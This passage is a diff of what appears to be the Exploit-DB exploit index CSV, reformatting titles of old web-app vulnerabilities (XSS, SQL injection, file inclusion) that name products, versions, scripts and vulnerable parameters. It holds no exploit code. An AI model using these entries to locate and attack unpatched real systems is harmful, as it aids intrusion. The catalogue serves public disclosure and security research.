31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 - '/docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps,0 -31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 - docs/examples/handlervalidate.spy x Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 -31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 - spyce/examples/request.spy name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 -31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - spyce/examples/getpost.spy Name Parameter Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 +31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 - 'docs/examples/handlervalidate.spy?x' Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 +31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 - 'spyce/examples/request.spy?name' Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 +31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - 'spyce/examples/getpost.spy?Name' Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps,0 31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0 31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections",2008-02-13,S@BUN,asp,webapps,0 31192,platforms/php/webapps/31192.txt,"Joomla! / Mambo Component com_model - 'objid' SQL Injection",2008-02-13,S@BUN,php,webapps,0 31193,platforms/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' SQL Injection",2008-02-13,S@BUN,php,webapps,0 31194,platforms/php/webapps/31194.txt,"Dokeos 1.8.4 - 'whoisonline.php?id' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 -31195,platforms/php/webapps/31195.txt,"Dokeos 1.8.4 - main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 +31195,platforms/php/webapps/31195.txt,"Dokeos 1.8.4 - 'main/inc/lib/events.lib.inc.php' Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 31196,platforms/php/webapps/31196.txt,"Dokeos 1.8.4 - '/main/calendar/myagenda.php?courseCode' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 31197,platforms/php/webapps/31197.txt,"Dokeos 1.8.4 - '/main/admin/course_category.php?category' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 31198,platforms/php/webapps/31198.txt,"Dokeos 1.8.4 - '/main/admin/session_list.php?cmessage' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps,0 @@ -32451,8 +32452,8 @@ id,file,description,date,author,platform,type,port 31356,platforms/php/webapps/31356.txt,"WordPress 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 31357,platforms/php/webapps/31357.txt,"WordPress 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting",2008-03-07,Doz,php,webapps,0 31358,platforms/php/webapps/31358.txt,"Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion",2008-03-07,ZoRLu,php,webapps,0 -31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath Parameter Cross-Site Scripting",2008-03-08,nnposter,php,webapps,0 -31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - logfileViewSettings.jsp filePath.0 Parameter Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 +31365,platforms/php/webapps/31365.txt,"Alkacon OpenCMS 7.0.3 - 'logfileViewSettings.jsp?filePath' Cross-Site Scripting",2008-03-08,nnposter,php,webapps,0 +31366,platforms/php/webapps/31366.txt,"Alkacon OpenCMS 7.0.3 - 'logfileViewSettings.jsp?filePath.0' Arbitrary File Access",2008-03-08,nnposter,php,webapps,0 31367,platforms/php/webapps/31367.txt,"Batchelor Media BM Classifieds - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0 31368,platforms/php/webapps/31368.txt,"PHP-Nuke 4nAlbum Module 0.92 - 'pid' SQL Injection",2008-03-10,meloulisi,php,webapps,0 31369,platforms/php/webapps/31369.txt,"Gallarific - 'search.php?query' Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 @@ -32463,16 +32464,16 @@ id,file,description,date,author,platform,type,port 31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 - 'addcomment.php?d' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Local File Inclusion",2008-03-10,THE_MILLER,php,webapps,0 31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' SQL Injection",2008-03-10,Lovebug,php,webapps,0 -31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 - 'watermark.php' File Parameter Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 -31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 - 'catalog_watermark.php' file Parameter Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 +31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 - 'watermark.php?File' Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 +31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 - 'catalog_watermark.php?file' Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 31382,platforms/php/webapps/31382.txt,"Joomla! / Mambo Component ensenanzas - 'id' SQL Injection",2008-03-11,The-0utl4w,php,webapps,0 31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' SQL Injection",2008-03-11,Houssamix,php,webapps,0 31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' SQL Injection",2008-03-11,Lovebug,php,webapps,0 31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,php,webapps,0 31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusions",2008-03-12,muuratsalo,php,webapps,0 31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 -31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - browse Action category Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 -31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - search_results Action search Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 +31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 +31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 - For Xoops 'gid' SQL Injection",2008-03-12,S@BUN,php,webapps,0 31393,platforms/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 31697,platforms/php/webapps/31697.txt,"Horde Webmail 1.0.6 - 'addevent.php' Cross-Site Scripting",2008-04-23,"Aria-Security Team",php,webapps,0 @@ -32506,19 +32507,19 @@ id,file,description,date,author,platform,type,port 31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection / Remote File Inclusion",2008-03-19,Cod3rZ,php,webapps,0 31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 -31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - '/manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - '/manager/getImportFileRedirect.jsp?file' Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - '/manager/FileManager.jsp?dir' Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 -31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 - 'delete_notes.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 - 'delete_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 - 'edit_forum.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 - 'mail_users.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 - 'moderate_notes.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - 'create_forum.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - 'create_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 - 'delete_notes.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 - 'delete_user.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 - 'edit_forum.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 - 'mail_users.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 - 'moderate_notes.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php?bn_dir_default' Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 31459,platforms/php/webapps/31459.txt,"Joomla! 3.2.1 - SQL Injection",2014-02-06,killall-9,php,webapps,80 31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 @@ -32527,51 +32528,51 @@ id,file,description,date,author,platform,type,port 31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 - 'manpage.html' Cross-Site Scripting",2008-03-22,Linux_Drox,php,webapps,0 31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCMS 7.0.3 - 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor - 'id' SQL Injection",2008-03-24,RMx,php,webapps,0 -31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 - locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 - search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 - Classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 - Classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 - controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 - controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 - controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 - controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 - controlcenter/sign-up.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 - controlcenter/update.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 - controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 - controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 - controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 - controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 - controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - '/controlpannel/alterNews.php3' DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 - controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 - controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 - controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 - controlpannel/createFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 - controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 - controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 - controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 - '/controlpannel/createNews.php3' DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 - controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 - controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 - controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 - controlpannel/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 - controlpannel/mailadmin.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 - controlpannel/setUp.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 - include/sendit.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 - include/sendit2.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 - 'locate.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 - 'Classifieds/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 - 'Classifieds/view.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 - 'controlcenter/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 - 'controlcenter/manager.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 - 'controlcenter/pass.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 - 'controlcenter/remember.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 - 'controlcenter/sign-up.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 - 'controlcenter/update.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 - 'controlcenter/userSet.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 - 'controlcenter/verify.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 - 'controlpannel/alterCats.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 - 'controlpannel/alterFeatured.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 - 'controlpannel/alterHomepage.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 - '/controlpannel/alterNews.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 - 'controlpannel/alterTheme.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 - 'controlpannel/color_help.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 - 'controlpannel/createdb.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 - 'controlpannel/createFeatured.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 - 'controlpannel/createHomepage.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 - 'controlpannel/createL.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 - 'controlpannel/createM.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 - '/controlpannel/createNews.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 - 'controlpannel/createP.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 - 'controlpannel/createS.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 - 'controlpannel/createT.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 - 'controlpannel/index.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 - 'controlpannel/mailadmin.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 - 'controlpannel/setUp.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 - 'include/sendit.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 - 'include/sendit2.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - 'include/adminHead.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - 'include/usersHead.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 +31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php?zID' SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 -31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 +31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - 'Backend' Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80 31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hard-Coded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 - 'irc.php' Local File Inclusion",2008-03-25,0in,php,webapps,0 -31537,platforms/cgi/webapps/31537.txt,"BlackBoard Academic Suite 6/7 - webapps/BlackBoard/execute/viewCatalog searchText Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 -31538,platforms/cgi/webapps/31538.txt,"BlackBoard Academic Suite 6/7 - bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 +31537,platforms/cgi/webapps/31537.txt,"BlackBoard Academic Suite 6/7 - '/webapps/BlackBoard/execute/viewCatalog?searchText' Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 +31538,platforms/cgi/webapps/31538.txt,"BlackBoard Academic Suite 6/7 - '/bin/common/announcement.pl?data__announcements___pk1_pk2__subject' Cross-Site Scripting",2008-03-26,Knight4vn,cgi,webapps,0 31539,platforms/php/webapps/31539.txt,"PHPAddressBook 2.0 - 'index.php' SQL Injection",2008-03-26,"Virangar Security",php,webapps,0 31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x - 'Signature' iFrame Security",2008-03-26,SHAHEE_MIRZA,php,webapps,0 31543,platforms/php/webapps/31543.txt,"GeeCarts - 'show.php?id' Cross-Site Scripting",2008-03-26,"Ivan Sanchez",php,webapps,0 @@ -32586,10 +32587,10 @@ id,file,description,date,author,platform,type,port 40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - 'setup.php?language_setup' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 -31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php' test Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 +31566,platforms/php/webapps/31566.txt,"@lex Guestbook 4.0.5 - 'index.php?test' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 - 'setup.php' Cross-Site 